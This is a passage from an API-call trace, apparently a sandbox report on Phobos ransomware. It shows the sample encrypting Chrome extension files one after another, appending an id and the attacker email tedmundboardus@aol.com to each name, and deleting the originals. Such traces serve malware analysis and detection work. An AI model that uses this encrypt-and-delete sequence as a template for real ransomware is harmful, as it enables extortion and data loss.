"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.427] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.427] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdd, lpOverlapped=0x0) returned 1 [0148.428] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0148.429] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0148.429] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.430] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.430] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.430] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.430] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.430] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.430] CloseHandle (hObject=0x18c) returned 1 [0148.430] CloseHandle (hObject=0x138) returned 1 [0148.430] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json")) returned 1 [0148.431] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.432] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=270) returned 1 [0148.432] CloseHandle (hObject=0x138) returned 1 [0148.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json")) returned 0x2020 [0148.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.432] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.432] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.433] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.433] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.433] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10e, lpOverlapped=0x0) returned 1 [0148.434] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0148.434] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0148.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.435] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.435] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.435] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.435] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.435] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.435] CloseHandle (hObject=0x138) returned 1 [0148.435] CloseHandle (hObject=0x18c) returned 1 [0148.436] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json")) returned 1 [0148.436] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.437] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=237) returned 1 [0148.437] CloseHandle (hObject=0x18c) returned 1 [0148.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json")) returned 0x2020 [0148.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.437] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.437] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.438] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.438] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xed, lpOverlapped=0x0) returned 1 [0148.439] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.439] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.439] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.440] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.440] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.440] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.440] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.440] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.440] CloseHandle (hObject=0x18c) returned 1 [0148.440] CloseHandle (hObject=0x138) returned 1 [0148.441] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json")) returned 1 [0148.442] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.443] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=215) returned 1 [0148.443] CloseHandle (hObject=0x138) returned 1 [0148.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0148.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.443] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.443] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.444] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.444] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.444] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd7, lpOverlapped=0x0) returned 1 [0148.480] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0148.480] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0148.480] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0148.481] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.481] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.481] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.481] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.481] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.481] CloseHandle (hObject=0x138) returned 1 [0148.481] CloseHandle (hObject=0x18c) returned 1 [0148.481] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json")) returned 1 [0148.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.082] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11094) returned 1 [0149.082] CloseHandle (hObject=0x148) returned 1 [0149.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json")) returned 0x2020 [0149.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.082] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.082] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.083] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.083] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.083] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b56, lpOverlapped=0x0) returned 1 [0149.137] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b60, dwBufLen=0x2b60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b60) returned 1 [0149.137] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2b60, lpOverlapped=0x0) returned 1 [0149.138] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0149.138] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.138] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0149.138] CryptDestroyKey (hKey=0xa32d28) returned 1 [0149.138] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, 